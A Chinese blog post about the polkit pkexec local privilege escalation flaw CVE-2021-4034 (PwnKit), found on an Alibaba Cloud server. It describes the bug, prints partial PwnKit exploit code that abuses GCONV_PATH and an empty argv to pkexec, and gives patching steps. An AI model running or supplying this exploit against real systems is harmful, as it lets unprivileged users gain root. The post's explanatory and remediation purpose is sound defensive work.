自我提升指南(一) 阿里云pkexec 中的本地提权漏洞 (CVE-2021-4034)

已于 2022-08-24 23:47:52 修改
阅读量2.7k 收藏 9
点赞数 9
分类专栏: 自我提升指南 Linux 文章标签: linux 阿里云 安全 学习
于 2022-04-19 11:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moer0/article/details/124261407
版权

自我提升指南(一) 阿里云pkexec 中的本地权限提升漏洞 (CVE-2021-4034)

我一登进阿里云,就发现事情不太对

文章目录

一、pkexec ?

polkit 的 pkexec 实用程序中存在一个本地权限提升漏洞。当前版本的 pkexec 无法正确处理调用参数计数,并最终尝试将环境变量作为命令执行。攻击者可以通过控制环境变量来利用这一点,从而诱导 pkexec 执行任意代码。利用成功后,会导致本地特权升级,非特权用户获得管理员权限。

二、漏洞危害

影响范围
自2009年以来的所有 Polkit 版本(存在于所有主流的 Linux 发行版中)。

1.错误代码

int main(int argc, char *argv[]) {
	FILE *fp;
	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
	fp = fopen("pwnkit/pwnkit.c", "w");
	fprintf(fp, "%s", shell);
	fclose(fp);
	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

2.修补漏洞

  1. 更新到最新的polkit版本
centos:yum -y install polkit
ubuntu:apt-get install policykit-1
  1. 将pkexec的suid权限取消
chmod 0755 /usr/bin/pkexec

结果

需要将 rwsr 权限置为 rwxr 权限
在这里插入图片描述

总结

Polkit本地权限提升漏洞(CVE-2021-4034)的漏洞出现的比较突然,没办法预料,那么就需要我们时常关注业内新闻,经常管理查看自己的服务器,以防止他人恶意的攻击或其他方式影响服务器与网站的正常工作。

希望这个博客能对你有所益处。我是轻王,我为自己代言。
猫轻王
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
CVE-2021-4034 polkit本地权限提升[pkexec权限问题]
01-27
polkitpkexec 发现的一个权限提升漏洞CVE-2021-4034 ,也称PwnKit),它存在于所有主流的 Linux 发行版的默认配置。 CentOS 7 polkit-0.112-26.el7_9.1.x86_64 不受影响。
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-4034漏洞详细原理以及复现,polkitpkexec的本地提权漏洞
Ba1_Ma0的博客
04-11 5573
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存,过程看起来像
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 920
2022年1月25日。
漏洞复现】利用CVE-2021-4034Linux提权
weixin_46022776的博客
05-07 191
CVE-2021-4034存在于Polkitpkexecpkexec是一个类似sudo的SUID root程序,允许授权用户作为其它用户执行程序,如未指定程序则运行默认shell,如果未指定用户名,则将作为管理员用户root执行。该漏洞自2009年5月起便已经存在,受影响的Linux发行版包括Ubuntu、Debian、Fedora、CentOS等。
RHSA-2022:0274: polkit pkexec 本地提权漏洞CVE-2021-4034
qq_40880022的博客
04-10 409
【代码】RHSA-2022:0274: polkit pkexec 本地提权漏洞CVE-2021-4034
polkit pkexec 本地提权漏洞修复方案
qq_34253002的博客
02-18 1627
6、Ubuntu 18.04 LTS、Ubuntu 20.04 LTS的用户可通过apt update policykit-1升级修复,Ubuntu 14.04、16.04、12.04官方已终止生命周期 (EOL)维护,修复需要额外付费购买Ubuntu ESM(扩展安全维护)服务,建议停止使用;2、CentOS 7的用户可通过yum update polkit升级修复(云安全Linux软件漏洞已支持检测修复),Centos 5、6、8官方已终止生命周期 (EOL)维护,建议停止使用;
Linux Polkit本地权限提升漏洞处理(CVE-2021- 4034
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
02-07 1万+
一、背景   安全部门近期发出安全预警,提示:常见发现版本的 CentOS、Ubuntu及Debian Linux系统默认安装的Polkit工具集存在本地权限提升漏洞CVE-2021- 4034),目前漏洞利用代码已在互联网公开;    Linux Polkit工具集是Linux系统在安装过程自带的系统工具集,其包括大量运维常用工具。该工具集pkexec在特定情况下无法正确处理调用参数计数,因此会尝试将环境变量作为命令执行。攻击者可以通过控制环境变量,使自身从系统普通用户权限提升至管理员权限,对
Linux pkexec高危漏洞 CVE-2021-4034修复
02-10
polkit rpm包 执行rpm -Uvh polkit-0.112-26.el7_9.1.x86_64.rpm 即可修复
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在内存...
漏洞利用 CVE-2021-4034-main.zip 提权漏洞
03-03
漏洞利用 CVE-2021-4034-main.zip 提权漏洞
gnome-shell-extension-services-systemd:Gnome Shell扩展,允许启动和停止systemd服务
03-11
服务系统 关于 Services Systemd是 Shell扩展,它允许通过主菜单面板状态区域的菜单启动和停止systemd服务。 由于存在许多不相关的系统服务-从显示在此菜单的意义上讲-用户可以预先选择应在扩展程序的首选项对话框显示哪些服务。 安装 Gnome Shell扩展页面 安装此扩展的最简单方法是通过官方的资源页面: : Arch Linux 对于Arch Linux,提供了AUR软件包 。 授权 通过密码提示从polkit软件包的pkexec命令pkexec 。 该命令通常会弹出一个图形密码提示。 没有密码提示 使用pkexec(默认) 在此扩展的最新版本,授权是由pkexec完成的(通过gksu之前)。 因此,如果您希望能够在不提示输入密码的情况下启动systemd服务,则必须配置polkit策略。 策略文件将允许执行systemctl [start|st
Linux】修复由 polkit 的组件 pkexec 引发的严重本地提权漏洞
zclinux的博客
02-23 1599
2022年1月25日,突然曝出的坏消息令 Linux 用户们错愕不已 —— Polkit 系统工具存在一项已有 12 年“悠久历史”的大 bug,攻击者能够借此在大多数主流 Linux 发行版获得至高无上的 root 权限。 简单来说,当黑客通过弱口令等途径,以普通用户的身份登录到你的 linux 系统,他能很简单的通过 pkexec 组件获取到 root 权限,然后把你的系统重装成 windows 为什么PwnKit 漏洞提权 root ▲ 看到第三位的 s (set uid)权限没有,就
Linux Polkit pkexec权限提升漏洞(CVE-2021-4034) centos系统polkit漏洞修复
weixin_45618691的博客
10-10 2638
polkit漏洞修复
linux pkexec允许授权用户以其他身份执行程序
热门推荐
qq_42896627的博客
07-16 1万+
ubuntu官方开发网站 http://manpages.ubuntu.com/ pkexec命令(详细介绍见如下网址) http://manpages.ubuntu.com/manpages/bionic/man1/pkexec.1.html pkexec 以其他用户身份执行的命令 pkexec [--user username] PROGRAM [ARGUMENTS...] pkexec允许授权用户以其他用户身份执行PROGRAM。如果用户名不是指定,则程序将以管理超级用户 root身份执行。 成功完
内网渗透-权限提升
qq_63980959的博客
04-05 1064
提高自己在服务器的权限,主要针对网站入侵过程,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限提权,顾名思义就是提高自己在服务器的权限 ,比如在windows本身登录的用户时guest,然后通过提权后就变成超级管理员(adminstrator),拥有了管理windwos的所有权限在Windwos,权限大概分为四种,分别是Users、Administrator、System、TrustedInstaller。
pkexec——linux上的root密码提示小工具
weixin_45983363的博客
12-13 3393
pkexec——Linux图形化界面下的提示输入root密码的工具pkexec pkexec 这种提示某个应用需要以超级用户的身份运行程序,可以在某些软件调用申请root密码
CVE-2021-4043】Linux本地提权漏洞复现
qq_38162031的博客
04-22 5120
实验步骤 文章目录实验步骤CVE-2021-4043 Linux本地提权漏洞实验背景实验环境漏洞复现构造payload用gcc编译后上传到阿里云执行payload CVE-2021-4043 Linux本地提权漏洞 CNVD-ID CNVD-2022-22323 公开日期 2022-03-24 危害级别 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 影响产品 GPAC GPAC <1.1.0 CVE ID CVE-2021-4043 漏洞描述 GPAC是
关于Linux Polkit组件pkexec程序权限提升漏洞解决办法(编号为CVE-2021-4034
weixin_50464533的博客
01-29 7136
前提 Polkit组件pkexec程序存在权限提升漏洞漏洞编号为CVE-2021-4034),攻击者可通过构造特定的参数诱导pkexec执行任意代码,从而获取本地管理员权限。 此文罗列出centos7版本的漏洞修复方法 操作方法 1.查看系统polkit组件版本信息 执行rpm -qa polkit命令(若版本信息为polkit-0.112-26.el7_9.1.x86_64,则无需升级,否则执行如下操作) 2.上传polkit polkit下载地址 链接:https:/.
CVE-2021-34527漏洞提权
最新发布
05-12
CVE-2021-34527,也被称为PrintNightmare漏洞,是一个Windows Print Spooler服务安全漏洞,影响了Windows 7、Windows Server 2008、Windows Server 2012和Windows Server 2016等操作系统版本。攻击者可以利用这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猫轻王

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值